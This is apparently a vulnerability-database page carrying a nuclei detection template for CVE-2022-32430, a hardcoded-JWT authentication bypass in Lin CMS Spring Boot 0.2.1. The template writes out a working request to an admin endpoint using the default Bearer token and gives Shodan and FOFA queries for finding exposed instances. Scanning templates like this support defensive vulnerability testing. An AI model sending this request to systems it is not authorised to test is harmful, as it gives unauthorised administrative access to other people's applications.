Lucene search
K

Lin CMS Spring Boot - Default JWT Token

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-32430
21 Jul 202216:15
attackerkb
Circl
CVE-2022-32430
21 Jul 202220:18
circl
CNNVD
Lin CMS Spring Boot 安全漏洞
21 Jul 202200:00
cnnvd
CVE
CVE-2022-32430
21 Jul 202215:52
cve
Cvelist
CVE-2022-32430
21 Jul 202215:52
cvelist
Github Security Blog
Hardcoded JWT Token in Lin CMS Spring Boot
22 Jul 202200:00
github
NVD
CVE-2022-32430
21 Jul 202216:15
nvd
OSV
CVE-2022-32430
21 Jul 202216:15
osv
OSV
GHSA-Q72P-4W56-HX7H Hardcoded JWT Token in Lin CMS Spring Boot
22 Jul 202200:00
osv
Prion
Design/Logic Flaw
21 Jul 202216:15
prion
Rows per page
id: CVE-2022-32430

info:
  name: Lin CMS Spring Boot - Default JWT Token
  author: DhiyaneshDK
  severity: high
  description: |
    An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.
  impact: |
    Unauthenticated attackers can access backend administrative information and functions using a hardcoded default JWT token, potentially gaining complete control over the Lin CMS Spring Boot application including user management and content administration.
  remediation: |
    Update Lin CMS Spring Boot to a version later than 0.2.1 that uses unique JWT secret keys, removes hardcoded tokens, and implements proper token rotation.
  reference:
    - https://github.com/TaleLin/lin-cms-spring-boot
    - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32430
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-32430
    epss-score: 0.03634
    epss-percentile: 0.88161
    cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: talelin
    product: lin-cms-spring-boot
    shodan-query: http.html:"心上无垢,林间有风"
    fofa-query: body="心上无垢,林间有风"
  tags: cve,cve2022,lin-cms,auth-bypass,talelin,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cms/admin/group/all"
    headers:
      Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"name":'
          - '"level":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '<html'
          - '<body'
          - '<script'
        negative: true
# digest: 4a0a00473045022071aacddb2b8703cbdf4dc0115170d9022f27b5117e217e3ae3dd9034badec5ce022100ceb1f08f9787dcd0d7b60ddb24a1c0bfd170f40d819de0606e9cd2d4279d904b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.03634
42